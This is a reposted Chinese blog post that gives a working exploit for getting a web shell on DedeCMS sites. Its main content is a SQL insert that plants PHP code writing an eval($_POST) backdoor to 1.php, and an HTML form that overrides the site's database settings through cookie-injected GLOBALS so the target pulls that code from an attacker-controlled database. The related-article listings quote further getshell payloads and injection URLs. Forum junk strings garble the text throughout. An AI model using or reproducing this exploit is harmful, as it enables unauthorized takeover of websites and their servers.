DEDECMS拿SHELL EXP

最新推荐文章于 2023-05-13 00:55:23 发布
最新推荐文章于 2023-05-13 00:55:23 发布
阅读量545 收藏
点赞数
分类专栏: CMS 文章标签: shell fp insert action php 数据库
转自:t00ls
网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell
  _1 U- t( B- F8 c
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下  1.php。原理自己研究。。。
- 低调求发展2 I' `  y- o! p/ ?
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />T00LS  p; A- k8 j1 T' U
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> - 低调求发展" ?( p, h4 `+ O3 Y0 y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />T00LS' D. E7 d' ]) I; |% B% V5 ^% o
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> - 低调求发展6 J1 `7 R/ h- `# x
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />www.t00ls.net0 |4 W% t; ~' H! U9 E  p
<input type="text" value="true" name="nocache" style="width:400">www.t00ls.net" }1 h9 H- {+ k  S# {2 i) ]8 Z
<input type="submit" value="提交" name="QuickSearchBtn"><br />www.t00ls.net8 Y- }  @# x' I% o" p5 j5 R0 P
</form>
<script>
function addaction()
{$ h3 `0 t5 i6 w
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
fengling132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
weixin_29863401的博客
03-11 538
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧谷歌批量还需改进 一会儿会补上!原文:http://www.wooyun.org/bug.php?action=view&id=2984测试如下:http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com...
织梦全部exp
12-19
织梦全部exp
dedecms最新版本修改任意管理员漏洞+getshell+exp
weixin_30439067的博客
08-03 4189
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
phpcms V9 getshell exp
收集盒 Book box
09-29 1972
#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r(' +---------------------------------------------------------------------------+ PHPCms V9 GETSHELL 0DAY c0de by
批量shell工具【2023】
05-13 364
批量shell工具【2023】一键自动化全自动工具,批量拿国内,海外shell,日出上百,对于我们自己,学习shell是为了自动化,而自动化则是为了提高工作效率,提高产出。
DedeCMS_V5.7-SP2后台getshell
KEY0NE的个人博客
10-09 302
测试环境Windows+PHPStudy(php5.5.38+Apache)测试程序http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz测试过程下载官方程序包,安装好、进后台---内容管理---商品---添加文档抓包POST /DedeCMS-V5.7-UTF8-SP2...
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
dedecms一键解密工具
10-11
dedecms一键解密工具 用起来方便简单 添加地址直接一键使用 dedecms网络渗透专用
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
dedecms 网站地图插件
02-15
标题中的“dedecms 网站地图插件”指的是基于织梦内容管理系统(DedeCms)的一个功能扩展,即用于生成网站地图的插件。网站地图是网站优化的重要工具,它能帮助搜索引擎更好地理解和索引网站内容,提高网页的收录率...
批量getshell教程+工具
07-28
批量getshell教程+工具
紫色时尚类dedecms手机web模板
05-26
【紫色时尚类dedecms手机web模板】是一个专为移动端设计的网站模板,适用于追求独特与时尚感的网站。此模板基于流行的CMS系统——DEDECMS(织梦内容管理系统)构建,旨在提供一种视觉上引人注目的网页设计,使用户在...
php探针批量shell,揭露全自动化黑产(自动批量SHELL一条龙)附工具
weixin_29723669的博客
03-20 783
我偶尔接触黑产冰山一角,得知黑产的开展比我们想象还快,曾经进化到全自动批量扫描SHELL一条龙,分离前辈揭露的,他们配合,从批量扫描到挂马到挂黑页等,一个傻瓜按钮就完成。我们看看以前,下发命令完成全自动发布广告,再分离如今的批量SHELL,很多中小网站都中标,我揭露的只是他们应用网上已发布的CMS破绽来写的一些批量工具,这还只是发布的一个破绽,CMS那么多破绽,假如都被应用了,想想都可怕。URL自...
DedeCMS多个漏洞exp汇总,以备后用
weixin_33976072的博客
11-03 720
爆路径:data/mysql_error_trace.inc一、dedecms plus/search.php注入漏洞修复及利用0×1:http://www.nxadmin.com/plus/search.php?keyword=as&typeArr[uNion]=a报错如果为:Safe Alert: Request Error step 2 !则利用以下exp:...
dedecms (织梦)漏洞&exp整理
weixin_34417183的博客
06-13 2692
[通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14...
DEDECMS 5.7 后门 exp再修改版
收集盒 Book box
05-11 1189
别说明:在舞林给出的exp的基础上修改而来!使自定义目标网站和目录更方便。(http://forum.cnsec.org/thread-82493-1-1.html)     先前发的那个修改版由于时间仓促没写判断目标是否存在漏洞的代码,刚才补上了。 PS:代码写的太烂,英语没学过几个单词,让大家见笑了,发现程序的bug欢迎提醒我。另外,写这个代码出于学习PHP的目的,如果有人用代码造成任何后
python学习之dedecms exp编写
cxk
05-24 724
python学习之dedecms exp编写 针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。 exp # -*- coding:utf-8 -*- import requests import time def dada(url): url_index=url+"/install/index.php" headers = {"...
Dedecms V5.7 sp2后台getshell漏洞复现(第一处)
weixin_42558965的博客
09-28 1077
前言:为了简便,试用了phpstudy 下载dedecms V5.7 sp2 使用phpstudy新建网站www.dedtest.com,并将下载的dedecms V5.7 sp2复制到其网站目录下,然后建站 开始复现 漏洞的只要原因是出现在了C:\phpstudy_pro\WWW\www.dedtest.com\dede文件夹下的sys_varifiles.php文件,一下为代码: /*----------------------- 下载文件 function _getfiles() ----------
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 552
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
dedecmsshell
最新发布
08-24
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值